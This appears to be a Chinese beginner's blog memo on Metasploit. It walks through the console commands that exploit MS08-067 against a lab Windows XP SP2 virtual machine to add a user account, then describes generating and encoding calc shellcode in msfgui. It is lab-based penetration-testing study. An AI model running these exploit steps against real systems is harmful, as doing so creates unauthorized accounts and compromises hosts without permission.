MetaSploit入门

简单的使用了一下MetaSploit,作个备忘,有需要的时候再系统学习下。

MetaSploit下载地址:https://github.com/rapid7/metasploit-framework/wiki/Downloads-by-Version

我下的最新版本号为4.4.0-dev,集成了840 exploits - 495 auxiliary - 250 payloads - 27 encoders - 8 nops

默认安装的东西如下图:



其中Access MetaSploit Web UI配置漏洞一直没有搞明白,所以下面使用的是MetaSploit Console,反正命令也少,使用也比较简单。

另外,Framework  MSFGUI提供了很好的图形界面,貌似是联网更新的实时数据,可用exploit和payload都比Console下面多。

----------------------

目标:重现漏洞ms08_067_netapi的利用过程

虚拟机:Windows XP SP2

主机:Windows 7

进入Console后,输入?或help可以查看可用的命令

重现漏洞利用的命令如下:

使用漏洞

use exploit/windows/smb/ms08_067_netapi

设置payload为添加新用户
set payload windows/adduser

查看要设置的参数

show options

下图显示可以设置的模块参数有RHOST,RPORT,SMBPIPE,payload参数有EXITFUNC,USER,PASS,只需要设置部分参数。


设置远程主机ip,即Winsow XP的ip
set RHOST 192.168.1.102
显示漏洞可攻击的目标
show targets
设置目标为17,即Windows XP SP2 Chinese - Simplified (NX)
set target 17
漏洞利用攻击
exploit
----------------
之后在虚拟机就可以看到新增了的用户metasploit,当然这是默认的新增用户名和密码,在漏洞利用攻击前可以改成别的。

------------------------------分割线---------------------------------------------------------------

利用MetaSploit产生shellcode

打开msfgui,选择Payloads,可以看到针对不同系统和不用语言的选项


选择windows/exec后,弹出如下配置窗口


可以配置要执行的命令(图中为计算器calc)、退出方式

选display,可以直接看到没经过处理的shellcode,会有坏字符'\x00'

选encode编码后,可以配置输出路径、编码器、输出格式,要过滤的坏字符等,点击"Geneate"查看输出文件就可以看到shellcode


  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值